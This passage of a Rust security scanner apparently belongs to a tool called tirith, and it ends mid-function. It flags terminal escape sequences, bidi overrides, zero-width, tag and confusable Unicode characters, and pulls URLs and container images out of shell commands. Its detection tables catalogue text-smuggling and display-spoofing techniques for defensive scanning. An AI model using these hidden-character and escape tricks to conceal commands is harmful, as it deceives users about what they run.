use once_cell::sync::Lazy;
use regex::Regex;
use crate::parse::{self, UrlLike};
use crate::tokenize::{self, Segment, ShellType};
/// Where the scanned input came from; selects which tier-1 pre-filter applies.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// A command line about to be executed.
    Exec,
    /// Pasted text.
    Paste,
    /// File contents; tier-1 pre-filtering always passes (see `tier1_scan`).
    FileScan,
}
// Build-time generated tables (regex pattern strings and extractor IDs),
// written by the build script into $OUT_DIR/tier1_gen.rs.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
/// IDs of the extractors baked into the build-time generated tier-1 tables.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
// Tier-1 pre-filter regexes, compiled lazily on first use from the
// build-time generated pattern strings.
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
// Matches scheme URLs (http/https/ftp/ssh/git) and scp-style
// `user@host:path` remotes anywhere inside a string.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
/// Aggregated result of `scan_bytes`: one flag per finding category plus the
/// individual findings that produced them.
pub struct ByteScanResult {
    // ANSI/VT escape introducers (CSI/OSC/APC/DCS) or a trailing ESC byte.
    pub has_ansi_escapes: bool,
    // C0 controls (excluding \n, \t, ESC), DEL, or a bare CR not followed by LF.
    pub has_control_chars: bool,
    // Unicode bidirectional control characters.
    pub has_bidi_controls: bool,
    // Zero-width characters (ZWSP/ZWNJ/ZWJ, BOM past offset 0, etc.).
    pub has_zero_width: bool,
    // Whole-input property: the bytes are not valid UTF-8 (no per-byte finding).
    pub has_invalid_utf8: bool,
    // Characters from the Tags block (U+E0000..U+E007F).
    pub has_unicode_tags: bool,
    // Variation selectors (U+FE00..U+FE0F, U+E0100..U+E01EF).
    pub has_variation_selectors: bool,
    // Invisible math operators (U+2061..U+2064).
    pub has_invisible_math_operators: bool,
    // Typographic spaces that render like ordinary blanks.
    pub has_invisible_whitespace: bool,
    // Hangul filler characters used as invisible placeholders.
    pub has_hangul_fillers: bool,
    // Characters visually confusable with other (ASCII) characters.
    pub has_confusable_text: bool,
    // One entry per individual detection.
    pub details: Vec<ByteFinding>,
}
/// A single suspicious byte/character detection within the scanned input.
pub struct ByteFinding {
    // Byte offset into the scanned input.
    pub offset: usize,
    // The first byte at `offset`.
    pub byte: u8,
    // Decoded Unicode scalar value, when the finding is a multi-byte character.
    pub codepoint: Option<u32>,
    // Human-readable category label; `with_ignored_range` re-derives the
    // category flags by matching on this text.
    pub description: String,
}
impl ByteScanResult {
    /// Drops findings whose offset falls inside `ignore` and re-derives every
    /// per-finding category flag from the findings that remain.
    ///
    /// `has_invalid_utf8` is a whole-input property (it has no corresponding
    /// finding) and is deliberately left untouched.
    pub fn with_ignored_range(mut self, ignore: &std::ops::Range<usize>) -> Self {
        self.details.retain(|finding| !ignore.contains(&finding.offset));
        self.has_ansi_escapes = false;
        self.has_control_chars = false;
        self.has_bidi_controls = false;
        self.has_zero_width = false;
        self.has_unicode_tags = false;
        self.has_variation_selectors = false;
        self.has_invisible_math_operators = false;
        self.has_invisible_whitespace = false;
        self.has_hangul_fillers = false;
        self.has_confusable_text = false;
        for finding in &self.details {
            let desc = finding.description.as_str();
            // Escape findings are recognized by suffix; every other category
            // by its description prefix. First matching category wins.
            if desc.ends_with("escape sequence") || desc == "trailing escape byte" {
                self.has_ansi_escapes = true;
                continue;
            }
            let flag = if desc.starts_with("control character") {
                &mut self.has_control_chars
            } else if desc.starts_with("bidi control") {
                &mut self.has_bidi_controls
            } else if desc.starts_with("zero-width character") {
                &mut self.has_zero_width
            } else if desc.starts_with("unicode tag") {
                &mut self.has_unicode_tags
            } else if desc.starts_with("variation selector") {
                &mut self.has_variation_selectors
            } else if desc.starts_with("invisible math operator") {
                &mut self.has_invisible_math_operators
            } else if desc.starts_with("invisible whitespace") {
                &mut self.has_invisible_whitespace
            } else if desc.starts_with("hangul filler") {
                &mut self.has_hangul_fillers
            } else if desc.starts_with("confusable") || desc.starts_with("text confusable") {
                &mut self.has_confusable_text
            } else {
                continue;
            };
            *flag = true;
        }
        self
    }
}
/// Cheap pre-filter deciding whether `input` deserves the full scan.
/// File scans are never filtered out.
pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
    let pattern = match context {
        ScanContext::Exec => &*TIER1_EXEC_REGEX,
        ScanContext::Paste => &*TIER1_PASTE_REGEX,
        ScanContext::FileScan => return true,
    };
    pattern.is_match(input)
}
/// Scans raw bytes for terminal-escape and Unicode-smuggling indicators,
/// recording one `ByteFinding` per detection and setting the matching
/// category flag on the result.
///
/// Detected: ANSI escape introducers (CSI/OSC/APC/DCS, or ESC as the final
/// byte), C0 control characters and DEL, bare CR not followed by LF, invalid
/// UTF-8 (flag only, no finding), and — for decoded multi-byte characters —
/// bidi controls, zero-width characters, Unicode tags, variation selectors,
/// invisible math operators, invisible whitespace, hangul fillers, and
/// confusables.
pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
    let mut result = ByteScanResult {
        has_ansi_escapes: false,
        has_control_chars: false,
        has_bidi_controls: false,
        has_zero_width: false,
        has_invalid_utf8: false,
        has_unicode_tags: false,
        has_variation_selectors: false,
        has_invisible_math_operators: false,
        has_invisible_whitespace: false,
        has_hangul_fillers: false,
        has_confusable_text: false,
        details: Vec::new(),
    };
    // Whole-input property; no per-byte finding is recorded for this flag.
    if std::str::from_utf8(input).is_err() {
        result.has_invalid_utf8 = true;
    }
    let len = input.len();
    let mut i = 0;
    while i < len {
        let b = input[i];
        if b == 0x1b {
            if i + 1 < len {
                let next = input[i + 1];
                // Only sequence introducers are flagged; a bare ESC followed
                // by any other byte falls through unflagged (and ESC is also
                // exempted from the C0 control check below).
                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
                    result.has_ansi_escapes = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: None,
                        description: match next {
                            b'[' => "CSI escape sequence",
                            b']' => "OSC escape sequence",
                            b'_' => "APC escape sequence",
                            b'P' => "DCS escape sequence",
                            _ => "escape sequence",
                        }
                        .to_string(),
                    });
                    i += 2;
                    continue;
                }
            } else {
                // ESC as the very last byte: possibly the start of an escape
                // sequence split across chunk boundaries.
                result.has_ansi_escapes = true;
                result.details.push(ByteFinding {
                    offset: i,
                    byte: b,
                    codepoint: None,
                    description: "trailing escape byte".to_string(),
                });
            }
        }
        if b == b'\r' {
            // A CR not followed by LF can rewrite the displayed line; CRLF
            // pairs and a trailing CR (i + 1 == len) are tolerated.
            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
            if is_attack_cr {
                result.has_control_chars = true;
                result.details.push(ByteFinding {
                    offset: i,
                    byte: b,
                    codepoint: None,
                    description: format!("control character 0x{b:02x}"),
                });
            }
        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
            // Remaining C0 controls; \n and \t are legitimate, ESC is
            // handled above.
            result.has_control_chars = true;
            result.details.push(ByteFinding {
                offset: i,
                byte: b,
                codepoint: None,
                description: format!("control character 0x{b:02x}"),
            });
        }
        if b == 0x7F {
            result.has_control_chars = true;
            result.details.push(ByteFinding {
                offset: i,
                byte: b,
                codepoint: None,
                description: "control character 0x7f (DEL)".to_string(),
            });
        }
        // 0xC0..=0xFF can only be the lead byte of a multi-byte UTF-8
        // sequence: decode one character and run the Unicode checks on it.
        if b >= 0xc0 {
            let remaining = &input[i..];
            // Try decoding the whole tail first; if that fails (invalid
            // bytes further on), retry on just the next 4 bytes.
            // NOTE(review): a valid char immediately followed by invalid
            // bytes inside that 4-byte window still fails both attempts and
            // is skipped — confirm this is acceptable (the input is already
            // flagged via has_invalid_utf8 in that case).
            if let Some(ch) = std::str::from_utf8(remaining)
                .ok()
                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
                .and_then(|s| s.chars().next())
            {
                if is_bidi_control(ch) {
                    result.has_bidi_controls = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("bidi control U+{:04X}", ch as u32),
                    });
                }
                // A BOM (U+FEFF) at the very start of the input is tolerated.
                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
                    result.has_zero_width = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("zero-width character U+{:04X}", ch as u32),
                    });
                }
                if is_unicode_tag(ch) {
                    result.has_unicode_tags = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("unicode tag U+{:04X}", ch as u32),
                    });
                }
                if is_variation_selector(ch) {
                    result.has_variation_selectors = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("variation selector U+{:04X}", ch as u32),
                    });
                }
                if is_invisible_math_operator(ch) {
                    result.has_invisible_math_operators = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("invisible math operator U+{:04X}", ch as u32),
                    });
                }
                if is_invisible_whitespace(ch) {
                    result.has_invisible_whitespace = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("invisible whitespace U+{:04X}", ch as u32),
                    });
                }
                if is_hangul_filler(ch) {
                    result.has_hangul_fillers = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("hangul filler U+{:04X}", ch as u32),
                    });
                }
                // Text-confusable table takes precedence over the general
                // confusable table; at most one finding is recorded.
                if let Some(target) = crate::text_confusables::is_text_confusable(ch) {
                    result.has_confusable_text = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!(
                            "text confusable U+{:04X} (looks like '{target}')",
                            ch as u32
                        ),
                    });
                } else if let Some(target) = crate::confusables::is_confusable(ch) {
                    result.has_confusable_text = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!(
                            "confusable U+{:04X} (looks like '{target}')",
                            ch as u32
                        ),
                    });
                }
                i += ch.len_utf8();
                continue;
            }
        }
        i += 1;
    }
    result
}
/// True for Unicode bidirectional control characters (marks, embeddings,
/// overrides, and isolates) that can visually reorder surrounding text.
fn is_bidi_control(ch: char) -> bool {
    const BIDI_CONTROLS: [char; 11] = [
        '\u{200E}', // LRM
        '\u{200F}', // RLM
        '\u{202A}', // LRE
        '\u{202B}', // RLE
        '\u{202C}', // PDF
        '\u{202D}', // LRO
        '\u{202E}', // RLO
        '\u{2066}', // LRI
        '\u{2067}', // RLI
        '\u{2068}', // FSI
        '\u{2069}', // PDI
    ];
    BIDI_CONTROLS.contains(&ch)
}
/// True for characters that render with zero width: Mongolian vowel
/// separator, ZWSP/ZWNJ/ZWJ, BOM/ZWNBSP, combining grapheme joiner, soft
/// hyphen, and word joiner.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 8] = [
        '\u{180E}', '\u{200B}', '\u{200C}', '\u{200D}',
        '\u{FEFF}', '\u{034F}', '\u{00AD}', '\u{2060}',
    ];
    ZERO_WIDTH.contains(&ch)
}
/// True for the Tags block (U+E0000..=U+E007F), which mirrors ASCII as
/// invisible characters.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch as u32, 0xE0000..=0xE007F)
}
/// True for variation selectors: VS1-VS16 (U+FE00..=U+FE0F) and the
/// supplementary VS17-VS256 (U+E0100..=U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch as u32, 0xFE00..=0xFE0F | 0xE0100..=0xE01EF)
}
/// True for hangul filler characters, which display as blank placeholders.
fn is_hangul_filler(ch: char) -> bool {
    ['\u{3164}', '\u{115F}', '\u{1160}'].contains(&ch)
}
/// True for the invisible math operators U+2061..=U+2064 (function
/// application, invisible times/separator/plus).
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch as u32, 0x2061..=0x2064)
}
/// True for typographic spaces (en quad through hair space,
/// U+2000..=U+200A) and the medium mathematical space (U+205F), all of
/// which pass visually as ordinary blanks.
fn is_invisible_whitespace(ch: char) -> bool {
    matches!(ch as u32, 0x2000..=0x200A | 0x205F)
}
/// Tokenizes `input` for the given shell and extracts every URL-like value:
/// scheme URLs and scp-style remotes from command words, arguments, and
/// leading env assignments; schemeless `host/path` arguments in sink
/// contexts; and docker/podman/nerdctl image references.
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();
    for (seg_idx, segment) in segments.iter().enumerate() {
        let sink_context = is_sink_context(segment, &segments);
        let resolved = resolve_segment_command(segment);
        // For a leading `tirith <inspection-subcommand> …` invocation, the
        // arguments from the subcommand onward are inert (inspected, not
        // executed) and must not be scanned as URL sources.
        let inspection_skip_args_from: Option<usize> = if seg_idx == 0 {
            resolved.as_ref().and_then(|cmd| {
                if cmd.name != "tirith" {
                    return None;
                }
                // Locate where tirith's own arguments begin: either the
                // segment command itself is `tirith`, or it appears as an
                // argument of a wrapper (e.g. `env tirith …`).
                let start_from: usize =
                    if segment.command.as_deref().map(command_base_name).as_deref()
                        == Some("tirith")
                    {
                        0
                    } else if let Some(at) = segment
                        .args
                        .iter()
                        .position(|a| command_base_name(a) == "tirith")
                    {
                        at + 1
                    } else {
                        return None;
                    };
                // Skip tirith's own flags to find the subcommand word.
                let mut i = start_from;
                while i < segment.args.len() {
                    let clean = strip_quotes(&segment.args[i]);
                    if clean.starts_with('-') {
                        i += 1;
                        continue;
                    }
                    break;
                }
                let sub_arg = segment.args.get(i)?;
                if is_tirith_inspection_subcommand(&command_base_name(sub_arg)) {
                    Some(i)
                } else {
                    None
                }
            })
        } else {
            None
        };
        // Raw strings to regex-scan for URLs: the command word plus each
        // argument, stopping at the inert tirith range if any.
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for (arg_idx, arg) in segment.args.iter().enumerate() {
            if let Some(skip_from) = inspection_skip_args_from {
                if arg_idx >= skip_from {
                    break;
                }
            }
            url_sources.push(arg.as_str());
        }
        // URLs assigned via leading `VAR=value` prefixes count too — except
        // proxy configuration variables, which are not destinations.
        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
            if ignores_env_assignment_url(&name) {
                continue;
            }
            let clean = strip_quotes(&value);
            if !clean.is_empty() {
                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
            }
        }
        for source in &url_sources {
            push_urls_from_source(source, seg_idx, sink_context, &mut results);
        }
        // Docker commands get dedicated image-reference handling below, so
        // their args are excluded from the schemeless-host heuristic.
        let is_docker_cmd = resolved
            .as_ref()
            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
        if sink_context && !is_docker_cmd {
            if let Some(cmd) = resolved.as_ref() {
                let is_remote_copy = matches!(cmd.name.as_str(), "scp" | "rsync");
                for (arg_idx, arg) in cmd.args.iter().enumerate() {
                    // Output-file and credential flag values are not URLs.
                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
                        continue;
                    }
                    let clean = strip_quotes(arg);
                    if is_remote_copy {
                        // NOTE(review): the parsed scp/rsync remote spec is
                        // discarded, so `host:path` remotes never reach
                        // `results` — confirm intentional (the `user@host:`
                        // form is already caught by URL_REGEX above).
                        let _ = parse_scp_remote_spec(&clean, shell);
                        continue;
                    }
                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                        results.push(ExtractedUrl {
                            raw: clean.clone(),
                            parsed: UrlLike::SchemelessHostPath {
                                host: extract_host_from_schemeless(&clean),
                                path: extract_path_from_schemeless(&clean),
                            },
                            segment_index: seg_idx,
                            in_sink_context: true,
                        });
                    }
                }
            }
        }
        // Container-image reference extraction for docker/podman/nerdctl.
        if let Some(cmd) = resolved.as_ref() {
            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = cmd.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // `build` names images via -t/--tag in three forms:
                        // separate value, attached `-tNAME`, and `--tag=NAME`.
                        let mut i = 1;
                        while i < cmd.args.len() {
                            let arg = strip_quotes(&cmd.args[i]);
                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
                                let tag_val = strip_quotes(&cmd.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        // `docker image pull/push/inspect/rm/tag IMAGE …`
                        if let Some(image_subcmd) = cmd.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }
    results
}
/// A URL-like value found by `extract_urls`.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    // The matched text as it appeared (quotes stripped where applicable).
    pub raw: String,
    // Structured interpretation of `raw`.
    pub parsed: UrlLike,
    // Index of the shell segment the value was found in.
    pub segment_index: usize,
    // True when the segment feeds a fetch/execute sink (see is_sink_context).
    pub in_sink_context: bool,
}
// docker/podman/nerdctl flags that consume the following argument as their
// value — that value must not be mistaken for the image reference.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];
// Short flags whose value may be attached directly (e.g. `-p8080:80`).
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
/// Pushes the first positional argument of a docker-style command as an
/// image reference, skipping options (and the values of value-taking flags).
/// Build contexts (`.`/`..`), stdin (`-`), and scheme URLs are ignored.
fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
    let mut consume_next = false;
    let mut past_options = false;
    for raw in args {
        if consume_next {
            consume_next = false;
            continue;
        }
        let token = strip_quotes(raw);
        if token == "--" {
            past_options = true;
            continue;
        }
        if !past_options && token.starts_with('-') {
            // `--flag=value` carries its value inline and needs no lookahead.
            let inline_value = token.starts_with("--") && token.contains('=');
            if !inline_value {
                if DOCKER_VALUE_FLAGS.contains(&token.as_str()) {
                    consume_next = true;
                }
                // NOTE(review): this attached-value prefix branch is a no-op
                // today — both paths fall through to the `continue` below.
                if DOCKER_VALUE_PREFIXES
                    .iter()
                    .any(|p| token.starts_with(p) && token.len() > p.len())
                {
                    continue;
                }
            }
            continue;
        }
        // First positional argument: treat as the image ref unless it is a
        // build context, stdin marker, or a scheme URL.
        if !token.contains("://") && token != "." && token != ".." && token != "-" {
            let parsed = parse::parse_docker_ref(&token);
            results.push(ExtractedUrl {
                raw: token,
                parsed,
                segment_index: seg_idx,
                in_sink_context: true,
            });
        }
        break;
    }
}
/// A command after unwrapping wrapper commands (`env`, `sudo`, `command`,
/// `time`, `tirith`): its lowercased base name plus remaining arguments.
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
    // Lowercased basename of the executable (path and quotes stripped).
    name: String,
    // Arguments following the resolved command word.
    args: &'a [String],
}
/// Appends every URL_REGEX match inside `source` to `results`, parsed into
/// its structured form.
fn push_urls_from_source(
    source: &str,
    segment_index: usize,
    in_sink_context: bool,
    results: &mut Vec<ExtractedUrl>,
) {
    results.extend(URL_REGEX.find_iter(source).map(|m| {
        let raw = m.as_str().to_string();
        let parsed = parse::parse_url(&raw);
        ExtractedUrl {
            raw,
            parsed,
            segment_index,
            in_sink_context,
        }
    }));
}
/// True for proxy-configuration environment variables whose URL values are
/// infrastructure settings, not destinations.
fn ignores_env_assignment_url(name: &str) -> bool {
    let upper = name.to_ascii_uppercase();
    upper.ends_with("_PROXY") || upper == "NO_PROXY"
}
/// True when an `env` long flag consumes a value (separately or via `=`).
fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = match flag.split_once('=') {
        Some((name, _)) => name,
        None => flag,
    };
    matches!(name, "--unset" | "--chdir" | "--split-string")
}
/// Lowercased basename of a possibly-quoted command path, handling both
/// `/` and `\` separators.
fn command_base_name(raw: &str) -> String {
    let clean = strip_quotes(raw);
    match clean.rsplit(['/', '\\']).next() {
        Some(base) => base.to_lowercase(),
        None => clean.to_lowercase(),
    }
}
/// Resolves a segment's command word through known wrapper commands.
fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
    let command = segment.command.as_ref()?;
    resolve_named_command(command, &segment.args)
}
/// Public variant of `resolve_segment_command` that returns owned data.
pub fn resolve_wrapped_command(segment: &Segment) -> Option<(String, Vec<String>)> {
    let resolved = resolve_segment_command(segment)?;
    Some((resolved.name, resolved.args.to_vec()))
}
/// Resolves a command name, recursively unwrapping the known wrappers
/// (`env`, `command`, `time`, `sudo`/`doas`, `tirith`); any other name is
/// returned as-is with its arguments.
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
    let name = command_base_name(command);
    match name.as_str() {
        "env" => resolve_env_command(args),
        "command" => resolve_command_wrapper(args),
        "time" => resolve_time_wrapper(args),
        "sudo" | "doas" => resolve_sudo_wrapper(args),
        "tirith" => resolve_tirith_command(args),
        _ => Some(ResolvedCommand { name, args }),
    }
}
/// Unwraps `sudo`/`doas`: skips the wrapper's flags (including flags that
/// consume a following value), env assignments, and `--`, then resolves the
/// first remaining token as the wrapped command.
fn resolve_sudo_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
    // Short flags that consume the next argument as their value.
    const SUDO_VALUE_FLAGS: &[&str] = &["-u", "-g", "-p", "-C", "-D", "-U", "-r", "-t"];
    // Long flags that consume the next argument unless written `--flag=value`.
    const SUDO_LONG_VALUE_FLAGS: &[&str] = &[
        "--user",
        "--group",
        "--prompt",
        "--close-from",
        "--chdir",
        "--other-user",
        "--role",
        "--type",
        "--host",
    ];
    let mut i = 0;
    let mut after_dashdash = false;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if !after_dashdash && clean == "--" {
            after_dashdash = true;
            i += 1;
            continue;
        }
        // `sudo VAR=val cmd` — assignments precede the command.
        if !after_dashdash && tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if !after_dashdash && clean.starts_with("--") {
            let name_part = clean.split_once('=').map(|(n, _)| n).unwrap_or(&clean);
            if !clean.contains('=') && SUDO_LONG_VALUE_FLAGS.contains(&name_part) {
                // Skip the flag and its separate value.
                i += 2;
            } else {
                i += 1;
            }
            continue;
        }
        if !after_dashdash && clean.starts_with('-') {
            if SUDO_VALUE_FLAGS.contains(&clean.as_str()) {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        // First non-flag, non-assignment token is the wrapped command.
        return resolve_named_command(&clean, &args[i + 1..]);
    }
    None
}
/// Unwraps `env`: skips assignments and env's own flags, then resolves the
/// first remaining token as the wrapped command. After `--`, only
/// assignments may still precede the command.
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut i = 0;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if clean == "--" {
            i += 1;
            break;
        }
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if clean.starts_with('-') {
            if clean.starts_with("--") {
                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
                    i += 2;
                } else {
                    i += 1;
                }
                continue;
            }
            // -u NAME / -C DIR / -S STRING consume a separate value.
            if clean == "-u" || clean == "-C" || clean == "-S" {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }
    // Reached only via `--` above (if the first loop ran off the end of the
    // args, this loop's condition is immediately false and we return None).
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }
    None
}
/// Unwraps the `command` builtin: skips its flags (none take values) and an
/// optional `--`, then resolves the next token as the wrapped command.
fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut idx = 0;
    for arg in args {
        let clean = strip_quotes(arg);
        if clean == "--" {
            idx += 1;
            break;
        }
        if !clean.starts_with('-') {
            break;
        }
        idx += 1;
    }
    args.get(idx)
        .and_then(|arg| resolve_named_command(arg, &args[idx + 1..]))
}
/// Unwraps `time`: skips its flags (format/output flags consume a value) and
/// an optional `--`, then resolves the next token as the wrapped command.
fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
    const VALUE_FLAGS: [&str; 4] = ["-f", "--format", "-o", "--output"];
    let mut idx = 0;
    while let Some(arg) = args.get(idx) {
        let clean = strip_quotes(arg);
        if clean == "--" {
            idx += 1;
            break;
        }
        if !clean.starts_with('-') {
            break;
        }
        idx += if VALUE_FLAGS.contains(&clean.as_str()) { 2 } else { 1 };
    }
    args.get(idx)
        .and_then(|arg| resolve_named_command(arg, &args[idx + 1..]))
}
/// `tirith run …` executes its arguments, so it resolves to the synthetic
/// sink name "tirith-run"; every other subcommand stays plain "tirith".
/// Returns `None` when there is no subcommand at all.
fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let subcommand = args.first().map(|arg| command_base_name(arg))?;
    match subcommand.as_str() {
        "run" => Some(ResolvedCommand {
            name: "tirith-run".to_string(),
            args: &args[1..],
        }),
        _ => Some(ResolvedCommand {
            name: "tirith".to_string(),
            args,
        }),
    }
}
/// True for tirith subcommands that only inspect their arguments (their
/// arguments are inert — never fetched or executed).
fn is_tirith_inspection_subcommand(sub: &str) -> bool {
    ["diff", "score", "why", "receipt", "explain"].contains(&sub)
}
/// For a leading `tirith <inspection-subcommand> …` command line, returns
/// the byte range of everything after the subcommand token. Those arguments
/// are inspected rather than executed, so scanners can discard findings
/// that fall inside the range (see `ByteScanResult::with_ignored_range`).
pub fn tirith_inert_arg_range(input: &str, shell: ShellType) -> Option<std::ops::Range<usize>> {
    let segments = tokenize::tokenize(input, shell);
    let first = segments.first()?;
    let resolved = resolve_segment_command(first)?;
    if resolved.name != "tirith" {
        return None;
    }
    // Skip tirith's flags to reach the subcommand word.
    let mut sub_idx = 0;
    while sub_idx < resolved.args.len() {
        let clean = strip_quotes(&resolved.args[sub_idx]);
        if clean.starts_with('-') {
            sub_idx += 1;
            continue;
        }
        break;
    }
    let sub_arg = resolved.args.get(sub_idx)?;
    let subcommand = command_base_name(sub_arg);
    if !is_tirith_inspection_subcommand(&subcommand) {
        return None;
    }
    // Map the subcommand token back to its byte position in the original
    // input so the inert range is expressed in input offsets.
    let seg_slice = input.get(first.byte_range.clone())?;
    let sub_rel = find_subcommand_token(seg_slice, sub_arg.as_str())?;
    let inert_start = first.byte_range.start + sub_rel + sub_arg.len();
    let inert_end = first.byte_range.end;
    if inert_start >= inert_end {
        return None;
    }
    Some(inert_start..inert_end)
}
/// Finds the byte offset of `needle` in `haystack` where it stands as a
/// whole whitespace-delimited token (or at the start/end of the string).
fn find_subcommand_token(haystack: &str, needle: &str) -> Option<usize> {
    let bytes = haystack.as_bytes();
    let needle_len = needle.len();
    let mut from = 0;
    loop {
        // `get` guards against `from` landing mid-codepoint; both a failed
        // slice and a failed find end the search.
        let abs = from + haystack.get(from..)?.find(needle)?;
        let ws_before = abs == 0
            || bytes
                .get(abs - 1)
                .is_some_and(|b| b.is_ascii_whitespace());
